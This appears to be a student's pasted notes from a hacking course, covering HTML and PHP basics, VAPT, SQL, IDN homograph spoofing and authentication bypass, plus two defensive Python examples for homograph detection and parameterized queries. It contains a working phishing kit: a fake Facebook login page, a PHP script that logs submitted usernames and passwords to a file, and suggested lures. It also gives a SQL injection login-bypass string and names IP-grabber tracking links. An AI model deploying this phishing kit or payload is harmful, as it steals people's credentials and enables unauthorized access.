LuciferAviSonicX

Weekend batch day 3

Sep 3rd, 2017
WebTechnologies And Basic Components
------------------------------------
1. Domain Name
2. Hosting
3. Server
4. Database
5. Technologies ----> HTML, PHP, JAVASCRIPT

--->Domain Name----> It is the name of the website that we purchase from a domain name provider ----> godaddy.com, wix, 000webhost

--->Hosting -----> Place where I keep the content of my website

--->Servers ----> They help in processing the request and give me the response

--->Database ----> are the backbone of the web technologies.... these are used to store data in the form of tables and columns

Technologies
------------
Programming languages and other tools which are used for building my website
php, HTML, Javascript, css, angularJS, asp .net


webpage ---> collection of hyperlinks and hypertext
website ---> collection of different web pages

Security
--------
1. SSL certificate ---> HTTPS ---> Secure Socket Layer
2. Firewall ----> filter---> malicious data
3. IPS and IDS ----> protect against attackers
IPS = Intrusion Prevention Service
IDS = Intrusion Detection Service

hello---> plain text
algo ---> encrypt ---> secret language
kijui----> cipher text ----> secret text
algo ----> decryption ---> secret text back to plain text
hello-----> plain text

Misconception
-------------
1. HTTPS will not save you
2. Firewall can be easily bypassed
3. All anti-malware can be evaded

Servers ---> Responsible for request and response
-------
1. Microsoft servers ----> IIS + Apache + MSSQL ---> Paid
2. Linux Server ---> Apache + Tomcat + MySQL,SQL ---> Both, paid and open source as well


Windows based server ----> WAMPP
W ---> Windows
A ---> Apache
M ---> MySQL
P ---> Perl
P ---> PHP

Linux based server ---> LAMPP
L ---> Linux
A ---> Apache
M ---> MySQL
P ---> Perl
P ---> PHP

When I don't know which OS it is ---> XAMPP
X ---> Cross Platform ---> portable software server
A ---> Apache
M ---> MySQL
P ---> Perl
P ---> PHP

HTML
----
HyperText Markup Language
<>--->tags ----> markup


1. <html>****</html> ----> it defines that my whole syntax is HTML ---> all the content of the webpage is written between these tags

2. <head>****</head> ----> it defines the header of the webpage

3. <title>***</title> ---> it gives the name shown in the tab --> always under the head tag

4. <body>***</body> ---> it defines the whole content of the body ---> this goes outside the head tag

5. <p>paragraph</p> ----> it defines a paragraph in the web page

6. <br> ---> it gives a new line in my web page.

7. <h>****</h> ----> It is used for providing a heading to my webpage content

8. <img src=""> ---> to insert an image into a web page

9. <a href=""> ----> I am providing a link for my data

10. <form>*****</form> ---> it will create a login type form
<input> ---> different elements


first.html
<html>
<head>
<title>First Page</title>
</head>
<body>
<a href="https://www.google.com/search?q=dragon+ball+z&client=ubuntu&channel=fs&tbm=isch&source=lnms&sa=X&ved=0ahUKEwjB-IXQ-vvVAhVLIlAKHXznCnYQ_AUICygC&biw=1309&bih=671&dpr=1">
<h1>Dragon Ball Z</h1>
</a>
<a href="https://www.google.com/search?client=ubuntu&channel=fs&biw=1309&bih=671&tbm=isch&sa=1&q=lucifer+&oq=lucifer+&gs_l=psy-ab.3..0i67k1j0l2j0i67k1.31225.32550.0.33264.8.8.0.0.0.0.518.1123.2-1j1j0j1.3.0....0...1.1.64.psy-ab..5.3.1120.9VRWyWn6WqQ">
<p>Hello, everyone.<br> This is my first web page.<br> My name is Lucifer Morning Star.</p>
</a>
<a href="https://www.google.com/search?q=goku&client=ubuntu&channel=fs&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjUxf3B-fvVAhUPU1AKHeNSD0YQ_AUICigB&biw=1309&bih=671"><img src="/home/avi_lucifer/Desktop/goku_by_bpsola-d6j32pk.jpg">
</a>
<p>Login Via Facebook Account</p>
<form action="second.html" method="get">
username : <input type="text"><br> <br>
password : <input type="password"><br> <br>
<input type="submit" onClick="second.html">
</form>
</body>
</html>


second.html
<html>
<head>
<title>Second Page</title>
</head>
<body>
<p> Welcome to the fake facebook</p>
</body>
</html>


PHP ----> Hypertext Preprocessor
-------------------------------
Basics of PHP
------------------
PHP is a server-side language, which is used to create dynamic websites.
PHP variables → they are temporary memory locations which hold input data.
A variable name should start with the $ sign.
After the $ sign, there is a letter [a-z][A-Z] or an underscore (_).
After that there will be a combination of alphanumeric characters and underscores.
E.g. $uname = "Abhijeet";
$s_salary = 30000;

PHP operators → they are used to manipulate data and variables.
Arithmetic Operator
+ → addition → $a + $b
- → subtraction → $a - $b
/ → division → $a / $b → quotient
* → multiplication → $a * $b
% → modulus → $a % $b → remainder
Assignment Operator
= → assign the value → $a = 10
+= → $a += $b → $a = $a + $b
-= → $a -= $b → $a = $a - $b
*= → $a *= $b → $a = $a * $b
/= → $a /= $b → $a = $a / $b
%= → $a %= $b → $a = $a % $b
Relational & Comparison Operator
> → $a > $b
< → $a < $b
>= → $a >= $b
<= → $a <= $b
== → $a == $b
!= → $a != $b
Logical Operator
AND (&&) → when all the conditions are true, then the answer will be true.
OR (||) → when any one of the conditions is true, then the answer is true.
NOT (!) → It will reverse the value… true to false and false to true.
PROGRAM
----------------
<?php
$a = 10;
$b = 20;
$sum = $a + $b;
echo "The sum is " . $sum;
?>
PHP Conditional Statement → they always return some boolean value… either true or false.
If | Else
if ($a > $b)
{
    echo "A is greater";
}
else
{
    echo "B is greater";
}
If else if else
if ($a > $b && $a > $c)
{
    echo "A is greater";
}
else if ($b > $a && $b > $c)
{
    echo "B is greater";
}
else
{
    echo "C is greater";
}
Nested If Else
<?php
$age = 27;
$gend = "Male";
if ($age > 25)
{
    // the inner check runs only when the age condition is true
    if ($gend == "Male")
    {
        echo "Eligible";
    }
    else
    {
        echo "Not eligible";
    }
}
else
{
    echo "Age is not 25 yet";
}
?>
PHP Loops → Looping is a process for executing a statement, or a group of statements, repeatedly.
For Loop → in this loop the condition is checked first and then the body is executed. It needs three things to start the loop → initialization, condition, iteration.
for (initialization; condition; iteration)
{
    Statements;
}


for ($i = 1; $i < 10; $i++)
{
    echo "likho <br>";   // "likho" means "write"
}
While Loop → the condition is checked at the start. It returns a boolean value.
while (condition)
{
    Statements;
    Iteration;
}

$num = 0;
while ($num < 5)
{
    echo $num;
    $num++;   // iteration step; without it the loop never ends
}
PHP Form → it consists of things like textboxes, labels, radio buttons, check buttons and submit buttons. Wherever you see a query form, login form or feedback form, they all use a PHP form.
Textbox
Password
Radiobutton
Checkbox
List|Menu
Textarea
Filefield
Submit button
Reset
Normal Button
PHP GET|POST →
GET → unsecure method, because it displays the form field values in the URL. Uses up to 1mb. Fast process.
POST → It is a secure method. Large amounts of data can be sent. It is a slow process.


tracing and tracking
--------------------

tracing---> terrorist--mail--PM
"I will plant a bomb in your house and run away"
who sent it---- from where he sent it


tracking---> the PM reported it... from where, when and who sent it


fuglikous.com

whoreadme.com


user agent---> the browser that the person is using for surfing the internet


VAPT
---
V = Vulnerability
A = Assessment
P = Penetration
T = Testing

VA+PT

VA--> we generate a report on the loopholes and weak points... from where we can get access to the machine or device----> vulnerabilities, loopholes, weak points---> no hacking, only report generation

PT--> Penetration Testing--> we hack into the systems and exploit them as per the VA report--> it is purely hacking


OWASP Top 10
------------
Open Web Application Security Project


DBMS---> Data Base Management System
database is the backbone of any website or server, where my data is stored in the form of tables and columns


SQL---> Structured Query Language
it is a query language via which I can fetch the data from the database, from a specific table and a specific column---> I take exactly what I need

SELECT trains FROM train_Database WHERE source="Delhi" AND destination="mumbai" AND date="7september" AND class="3AC"


DVWA--> Damn Vulnerable Web Application
it's a firmware/application which is used to check the PT skill of a candidate


whenever I set up my device as a server---- I access the server from localhost or the loopback address, which is 127.0.0.1
localhost


varchar==> variable + character---> House number G-33, street Number &


select, insert, update, delete, and, or


sql injection--->


Phishing
--------
Fish----> we will give bait to the people and hack their data

PHISHING ---> It is a process of creating a fake web page, and through that web page we can get the user's credentials....

How To Deploy It
----------------
We will create an account

HTML, css, js.....


Game Of Throne download page
adult worker
paytm recharge code
discount coupons
ola cabs free share pass


uthaLo.php

<?php -----> it is a php file and php script
header ('Location: http://www.facebook.com'); ----> when my php script has finished its work, I will drop the user at this site
$handle = fopen("log.txt", "a"); ------> creating the file
foreach($_POST as $variable => $value) ---> getting all the data in a loop
{
fwrite($handle, $variable); ---> 1 variable
fwrite($handle, "="); ----> = 2
fwrite($handle, $value); ----> data write 3
fwrite($handle, "\r\n"); ---->4 new line
}
fwrite($handle, "\r\n"); --> to write a new line
fclose($handle); ---> close it...log.txt
exit; ----> work done.... take the user to the location
?> ---> end of php

$handle ---> variable name
fopen ---> to open a file

Attribute in file

r ---> read --> I can only read
w ---> write --> it will create a new file if the name does not exist... else it will overwrite the old file
a ---> append ---> it works just like write, but it never deletes or overwrites the file; it continues writing in the same file


username=sdxjkchvs@gmail.com
password=liadsjkvcabl


IDN Homograph Attack
---------------------
IDN --> Internationalized Domain Name
India has many languages..... Hindi and Punjabi.....
The world has many languages----> Cyrillic, Greek, Arabic, English.......

Many alphabets have letters with the same representation as English characters
The Russian letters а, с, е, о, р, х and у
are identical to a, c, e, o, p, x and y.

dеерikа раdukоnе


рауtm.com
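
A defender-side check for the look-alike letters listed above, as an added example that is not part of the original notes. The `PROTECTED` list and the function names are assumptions for illustration; the confusable map contains only the seven Cyrillic letters the notes name.

```python
import unicodedata

# Cyrillic letters the notes list as look-alikes of Latin a, c, e, o, p, x, y.
CONFUSABLES = {
    "\u0430": "a", "\u0441": "c", "\u0435": "e", "\u043e": "o",
    "\u0440": "p", "\u0445": "x", "\u0443": "y",
}
# Assumption: a small list of names the defender wants to protect.
PROTECTED = {"paytm.com", "facebook.com"}


def scripts(label):
    """Unicode scripts used by the letters of one label, e.g. {'LATIN'}."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0]
            for ch in label if ch.isalpha()}


def skeleton(domain):
    """Replace known Cyrillic look-alikes so a spoof equals its target."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in domain.lower())


def check_domain(domain):
    """Return 'ok', 'mixed-script' or 'lookalike:<protected name>'."""
    domain = domain.lower()
    if domain.isascii():
        return "ok"
    if skeleton(domain) in PROTECTED:
        return "lookalike:" + skeleton(domain)
    if any(len(scripts(label)) > 1 for label in domain.split(".")):
        return "mixed-script"
    return "ok"  # single-script IDN, e.g. a genuine Cyrillic name


def to_punycode(domain):
    """ASCII (xn--) form of the name, safe to show in logs and alerts."""
    return domain.encode("idna").decode("ascii")


# Constructed sample: Cyrillic er, a, u followed by Latin "tm".
SPOOF = "\u0440\u0430\u0443tm.com"

if __name__ == "__main__":
    for name in ("paytm.com", SPOOF, "g\u043e\u043egle.com"):
        print(to_punycode(name), "->", check_domain(name))
```

Showing the `xn--` form in mail gateways, proxies and alerts makes the spoofed name visibly different from the real one.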


A mail arrived.... you will be dead in the evening--->
I will find from where this email has been sent-----> tracing
now I will reply to the person with a mail.... and through that mail I will try to find the person or try to gather information ----> tracking


grabify ---> https://grabify.link/
fuglekus ---> www.fuglekos.com/ip-grabber


mage [goku.jpg] successfully uploaded!
Folder name [2017-8-30]


Your image 'goku.jpg'
in folder '2017-8-30' has been uploaded.


whoreadme----> tracking


Plain Text ----> Hello
Ciphers ---> encrypting my messages....----> aheel ----> key ---> mail
key ----> decrypt


Authentication Bypass
-----------------------
I will log in as the administrator and can have whatever I want to have...


GATES ----> AND, OR


AND ---> if any of my values is 0 then my answer will be 0

A   B   A AND B
0   0   0
0   1   0
1   0   0
1   1   1

OR ---> If any of the values is 1 then the answer will be 1

A   B   A OR B
0   0   0
0   1   1
1   0   1
1   1   1

admin 'and' 1'or'1'='1
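
Why the AND/OR tables matter for the login line above, shown as the vulnerable query beside its parameterized fix. This is an added example, not code from the original notes. It assumes the line means username `admin` with password `1'or'1'='1`; the `users` table, its rows and the function names are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """In-memory table with constructed rows (plaintext passwords for demo only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "S3cret!"), ("guest", "guest123")])
    return db


def build_query(username, password):
    """Vulnerable: user input is pasted straight into the SQL text."""
    return ("SELECT COUNT(*) FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(db, username, password):
    return db.execute(build_query(username, password)).fetchone()[0] > 0


def login_safe(db, username, password):
    """Hardened: placeholders keep the input as data, never as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0


def truth(a, b, c):
    """(A AND B) OR C: the shape the injected WHERE clause takes."""
    return (a and b) or c


PAYLOAD = "1'or'1'='1"   # password field value taken from the notes

if __name__ == "__main__":
    db = make_db()
    # AND binds tighter than OR, so the trailing '1'='1' decides the result.
    print(build_query("admin", PAYLOAD))
    print("string-built query logs in:", login_vulnerable(db, "admin", PAYLOAD))
    print("parameterized query logs in:", login_safe(db, "admin", PAYLOAD))
```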